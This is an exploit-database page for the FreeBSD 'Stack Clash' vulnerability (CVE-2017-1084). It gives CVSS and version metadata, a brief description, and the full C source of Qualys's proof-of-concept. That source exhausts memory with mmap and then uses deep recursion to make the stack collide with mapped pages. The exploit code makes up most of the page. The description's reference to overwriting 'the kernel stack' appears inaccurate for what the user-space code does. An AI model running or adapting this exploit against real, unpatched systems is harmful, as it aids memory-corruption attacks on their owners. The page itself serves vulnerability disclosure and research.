header-logo
Suggest Exploit
vendor:
FreeBSD
by:
Qualys, Inc.
7,5
CVSS
HIGH
Stack Clash
119
CWE
Product Name: FreeBSD
Affected Version From: FreeBSD 10.3
Affected Version To: FreeBSD 11.1
Patch Exists: YES
Related CWE: CVE-2017-1084
CPE: o:freebsd:freebsd
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Mac, Windows
2017

FreeBSD_CVE-2017-FGPU.c

This program is a proof-of-concept exploit for CVE-2017-1084, a vulnerability in the FreeBSD kernel. It uses a technique called 'stack clash' to overwrite the stack guard page and gain access to the kernel stack. The exploit works by allocating memory pages in a loop until the kernel stack is reached. It then uses a function called 'smash_no_jump' to overwrite the stack guard page. Finally, it prints out the contents of the kernel stack to demonstrate that it has been successfully overwritten.

Mitigation:

The vulnerability can be mitigated by applying the appropriate security patches from the vendor.
Source

Exploit-DB raw data:

/*
 * FreeBSD_CVE-2017-FGPU.c for CVE-2017-1084 (please compile with -O0)
 * Copyright (C) 2017 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/time.h>

#define die() do { \
    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
    exit(EXIT_FAILURE); \
} while (0)

static const char * last_page;

static void
clash(void)
{
    for (;;) {
        const char * const page = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page <= last_page) die();
        if (page == MAP_FAILED) break;
        last_page = page;
    }
    if (!last_page) die();
}

static void
smash_no_jump(const size_t smash_size)
{
    char buf[1024];
    memset(buf, 'A', sizeof(buf));
    if (smash_size > sizeof(buf))
        smash_no_jump(smash_size - sizeof(buf));
}

#define SGROWSIZ        ((size_t)128UL*1024)            /* amount to grow stack */

int
main(void)
{
    static const struct rlimit core;
    if (setrlimit(RLIMIT_CORE, &core)) die();

    clash();
    smash_no_jump(SGROWSIZ / 2 * 3);
    printf("char at %p: %02x\n", last_page, *last_page);
    exit(EXIT_SUCCESS);
}